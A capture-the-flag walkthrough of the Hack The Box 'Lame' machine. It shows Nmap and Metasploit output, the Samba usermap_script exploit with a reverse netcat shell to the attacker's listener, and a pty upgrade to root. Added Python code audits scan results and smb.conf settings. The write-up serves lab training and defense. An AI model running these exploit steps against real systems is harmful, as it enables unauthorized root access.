Lame is a beginner-friendly box that tests the user’s ability to enumerate with Metasploit. This machine is often the first challenge that new users tackle on the Hack The Box platform, and this fact is reflected in the box’s difficulty.

Step 1: Enumerate with NMAP

We first run NMAP against the target to see what ports are open and which services are running.

➜  lame nmap -v -A 10.129.23.42 -p- -Pn
Starting Nmap 7.80 ( https://nmap.org ) at 2023-01-18 21:19 EST
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 21:19
Completed NSE at 21:19, 0.00s elapsed
Initiating NSE at 21:19
Completed NSE at 21:19, 0.00s elapsed
Initiating NSE at 21:19
Completed NSE at 21:19, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 21:19
Completed Parallel DNS resolution of 1 host. at 21:19, 0.03s elapsed
Initiating Connect Scan at 21:19
Scanning 10.129.23.42 [65535 ports]
Discovered open port 139/tcp on 10.129.23.42
Discovered open port 21/tcp on 10.129.23.42
Discovered open port 445/tcp on 10.129.23.42
Discovered open port 22/tcp on 10.129.23.42
Connect Scan Timing: About 20.30% done; ETC: 21:21 (0:02:02 remaining)
Connect Scan Timing: About 48.65% done; ETC: 21:21 (0:01:04 remaining)
Discovered open port 3632/tcp on 10.129.23.42
Completed Connect Scan at 21:20, 104.29s elapsed (65535 total ports)
Initiating Service scan at 21:20
Scanning 5 services on 10.129.23.42
Completed Service scan at 21:21, 11.09s elapsed (5 services on 1 host)
NSE: Script scanning 10.129.23.42.
Initiating NSE at 21:21
NSE: [ftp-bounce] PORT response: 500 Illegal PORT command.
Completed NSE at 21:21, 40.04s elapsed
Initiating NSE at 21:21
Completed NSE at 21:21, 0.07s elapsed
Initiating NSE at 21:21
Completed NSE at 21:21, 0.00s elapsed
Nmap scan report for 10.129.23.42
Host is up (0.025s latency).
Not shown: 65530 filtered ports
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 10.10.14.29
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
3632/tcp open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
|_smb-os-discovery: ERROR: Script execution failed (use -d to debug)
|_smb-security-mode: ERROR: Script execution failed (use -d to debug)
|_smb2-time: Protocol negotiation failed (SMB2)

NSE: Script Post-scanning.
Initiating NSE at 21:21
Completed NSE at 21:21, 0.00s elapsed
Initiating NSE at 21:21
Completed NSE at 21:21, 0.00s elapsed
Initiating NSE at 21:21
Completed NSE at 21:21, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 156.10 seconds

We can see that ports 22, 139, 445, and 3632 are exposed. Port 22 is usually not a viable attack vector, so my first inclination was to start with the Samba ports, 139 and 445.
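To turn a scan like the one above into something a defender can act on, here is a small parser (an added example, not part of the original walkthrough and not Nmap's own code) that reads Nmap's normal-output port table, attaches the NSE script lines to the port they describe, and flags what the scan already tells us: anonymous FTP, cleartext control and data channels, and banners that disclose an exact version. The sample input is a trimmed copy of the port table from the scan above; the function and constant names are my own.

```python
import re

# Sample input: the port table and the FTP script lines from the Nmap scan
# above, trimmed to what the parser needs (copied from the page's own output).
SAMPLE_NMAP_OUTPUT = """\
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|      Control connection is plain text
|      Data connections will be plain text
|_End of status
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
3632/tcp open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
"""

# One port-table row, e.g. "21/tcp   open  ftp         vsftpd 2.3.4"
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")
# "2.3.4" counts as an exact version; the fuzzy "3.X - 4.X" does not
EXACT_VERSION = re.compile(r"\d+\.\d+")


def parse_nmap_ports(text):
    """Parse Nmap normal output into a list of per-port dicts.

    NSE script lines start with '|' and follow the port they describe, so
    they are attached as 'notes' to the most recent port entry.
    """
    services, current = [], None
    for raw in text.splitlines():
        line = raw.rstrip()
        m = PORT_LINE.match(line)
        if m:
            port, proto, state, service, version = m.groups()
            current = {"port": int(port), "proto": proto, "state": state,
                       "service": service, "version": version, "notes": []}
            services.append(current)
        elif line.startswith("|") and current is not None:
            # drop the '|', '|_' and indentation Nmap uses for nesting
            current["notes"].append(line.lstrip("|_ ").strip())
    return services


def review_exposure(services):
    """Flag findings a defender would act on from the scan output alone."""
    findings = []
    for s in services:
        if s["state"] != "open":
            continue
        notes = " ".join(s["notes"])
        if "Anonymous FTP login allowed" in notes:
            findings.append((s["port"], "anonymous FTP login enabled"))
        if "plain text" in notes:
            findings.append((s["port"], "cleartext control/data channel"))
        if EXACT_VERSION.search(s["version"]):
            findings.append((s["port"], "exact version disclosed: " + s["version"]))
    return findings


if __name__ == "__main__":
    for port, message in review_exposure(parse_nmap_ports(SAMPLE_NMAP_OUTPUT)):
        print(f"{port}/tcp: {message}")
```

Run against the sample, the Samba ports produce no version finding because Nmap could only narrow them to "3.X - 4.X"; that is exactly why the walkthrough falls back to Metasploit's smb_version scanner in the next step.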

Step 2: Enumerating Samba

After searching fruitlessly for Samba enumeration techniques that would work on this box, I eventually tried Metasploit’s smb_version scanner.

msf6 > use auxiliary/scanner/smb/smb_version
msf6 auxiliary(scanner/smb/smb_version) > show options

Module options (auxiliary/scanner/smb/smb_version):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS                    yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   THREADS  1                yes       The number of concurrent threads (max one per host)


View the full module info with the info, or info -d command.

msf6 auxiliary(scanner/smb/smb_version) > set rhosts 10.129.23.42
rhosts => 10.129.23.42
msf6 auxiliary(scanner/smb/smb_version) > run

[*] 10.129.23.42:445      - SMB Detected (versions:1) (preferred dialect:) (signatures:optional)
[*] 10.129.23.42:445      -   Host could not be identified: Unix (Samba 3.0.20-Debian)
[*] 10.129.23.42:         - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

We simply supply the IP address of the box we want to scan and, hopefully, Metasploit will return a valid result. In this case we can see that the Samba version is 3.0.20.

Step 3: Exploiting Samba 3.0.20

Our next step is to find an exploit for the target software and version, Samba 3.0.20. After some searching I was able to find another Metasploit module that exploits Samba: https://www.rapid7.com/db/modules/exploit/multi/samba/usermap_script/. This module supplies a username containing shell metacharacters, which allows an attacker to execute commands of their choosing. In this case, we want to gain shell access to the target.
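From the defender's side, this exploit needs two things to line up: the non-default "username map script" option in smb.conf, which makes Samba pass the client-supplied username to a script through /bin/sh, and a Samba build older than the 3.0.25 fix (the Metasploit module targets 3.0.20 through 3.0.25rc3). The following is an added example, not code from the walkthrough or from the Samba project: it parses an smb.conf fragment, checks the version string reported by the smb_version scan above, and reports whether both conditions coincide. The two smb.conf fragments are constructed for illustration; the hardened one keeps username mapping but does it through the static "username map" file, which Samba reads itself without invoking a shell. All function names are my own.

```python
import re

# Constructed smb.conf fragment (not taken from the Lame box). It sets the
# non-default option the usermap_script module abuses: Samba hands the
# client-supplied username to this script through /bin/sh.
WEAK_SMB_CONF = """\
[global]
    workgroup = WORKGROUP
    server string = file server
    username map script = /etc/samba/scripts/mapusers.sh

[tmp]
    path = /tmp
    read only = no
"""

# Hardened variant: mapping comes from a static file that Samba parses itself,
# so no shell is ever involved in handling the username.
HARDENED_SMB_CONF = """\
[global]
    workgroup = WORKGROUP
    server string = file server
    username map = /etc/samba/smbusers

[tmp]
    path = /tmp
    read only = no
"""

# Version string as reported by the smb_version scan above.
REPORTED_VERSION = "Samba 3.0.20-Debian"

# Samba shipped the fix for the username map script command injection in
# 3.0.25; anything older, including the 3.0.25 release candidates, is affected.
FIXED_VERSION = (3, 0, 25)


def parse_smb_conf(text):
    """Minimal smb.conf parser returning {section: {parameter: value}}.

    Samba treats parameter names as case-insensitive and ignores whitespace
    inside them ('Username Map Script' == 'usernamemapscript'), so keys are
    normalised to the whitespace-free lower-case form.
    """
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":        # blank line or comment
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections[current] = {}
        elif "=" in line and current is not None:
            key, value = line.split("=", 1)
            sections[current]["".join(key.split()).lower()] = value.strip()
    return sections


def parse_samba_version(banner):
    """Return (major, minor, patch, is_prerelease) from a banner such as
    'Samba 3.0.20-Debian' or 'Samba 3.0.25rc3', or None if none is found."""
    m = re.search(r"(\d+)\.(\d+)\.(\d+)(rc\d+|pre\d+)?", banner)
    if not m:
        return None
    major, minor, patch, pre = m.groups()
    return (int(major), int(minor), int(patch), pre is not None)


def version_predates_fix(banner):
    """True if the reported Samba version is older than the 3.0.25 fix."""
    ver = parse_samba_version(banner)
    if ver is None:
        return False
    numeric, prerelease = ver[:3], ver[3]
    return numeric < FIXED_VERSION or (numeric == FIXED_VERSION and prerelease)


def audit_smb_conf(conf_text, banner):
    """Return the findings for a config and banner; both must hold to be exploitable."""
    findings = []
    script = parse_smb_conf(conf_text).get("global", {}).get("usernamemapscript")
    if script:
        findings.append(f"username map script is set ({script}); usernames reach /bin/sh")
    if version_predates_fix(banner):
        findings.append(f"{banner} predates the 3.0.25 fix for the username map script injection")
    return findings


def is_exploitable(conf_text, banner):
    """The usermap_script module only works when the option and the old version coincide."""
    has_script = bool(parse_smb_conf(conf_text).get("global", {}).get("usernamemapscript"))
    return has_script and version_predates_fix(banner)


if __name__ == "__main__":
    for finding in audit_smb_conf(WEAK_SMB_CONF, REPORTED_VERSION):
        print("-", finding)
    print("exploitable:", is_exploitable(WEAK_SMB_CONF, REPORTED_VERSION))
```

Removing the option is the quickest mitigation on a box that cannot be upgraded, but the version finding stands on its own: Samba 3.0.20 is long out of support, so the real fix is the upgrade.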

msf6 auxiliary(scanner/smb/smb_version) > search username map

Matching Modules
================

   #  Name                                        Disclosure Date  Rank       Check  Description
   -  ----                                        ---------------  ----       -----  -----------
   0  exploit/windows/imap/imail_delete           2004-11-12       average    No     IMail IMAP4D Delete Overflow
   1  exploit/windows/imap/mailenable_w3c_select  2005-10-03       great      Yes    MailEnable IMAPD W3C Logging Buffer Overflow
   2  auxiliary/scanner/oracle/oracle_login                        normal     No     Oracle RDBMS Login Utility
   3  exploit/multi/samba/usermap_script          2007-05-14       excellent  No     Samba "username map script" Command Execution
   4  exploit/linux/imap/imap_uw_lsub             2000-04-16       good       Yes    UoW IMAP Server LSUB Buffer Overflow


Interact with a module by name or index. For example info 4, use 4 or use exploit/linux/imap/imap_uw_lsub

msf6 auxiliary(scanner/smb/smb_version) > use 3
[*] No payload configured, defaulting to cmd/unix/reverse_netcat

In this case, we need to supply the IP address of the target, as well as the IP address and listening port of the attacker. We can then run the attack against the target.

msf6 exploit(multi/samba/usermap_script) > show options

Module options (exploit/multi/samba/usermap_script):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT   139              yes       The target port (TCP)


Payload options (cmd/unix/reverse_netcat):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.0.173    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic



View the full module info with the info, or info -d command.

msf6 exploit(multi/samba/usermap_script) > set rhosts 10.129.23.42
rhosts => 10.129.23.42
msf6 exploit(multi/samba/usermap_script) > set lhost 10.10.14.29
lhost => 10.10.14.29
msf6 exploit(multi/samba/usermap_script) > run

[*] Started reverse TCP handler on 10.10.14.29:4444 
[*] Command shell session 1 opened (10.10.14.29:4444 -> 10.129.23.42:53012) at 2023-01-18 21:43:09 -0500

We can see that a command shell session was opened, but nothing else is printed and there is no prompt. We can try running the 'ls' command to confirm that we are really in a remote Linux filesystem.

ls
bin
boot
cdrom
dev
etc
home
initrd
initrd.img
initrd.img.old
lib
lost+found
media
mnt
nohup.out
opt
proc
root
sbin
srv
sys
tmp
usr
var
vmlinuz
vmlinuz.old

The above output confirms that we are on a remote Linux system, but we don’t have a proper terminal. After checking that Python is installed on the remote machine, we can run the following command to spawn a pseudo-terminal and upgrade our shell.

python --version
Python 2.5.2
python -c 'import pty; pty.spawn("/bin/bash")'
root@lame:/#

We can now see that we have access to the root account and the challenge has been completed. We now just need to navigate to each user’s desktop to collect the flag and submit.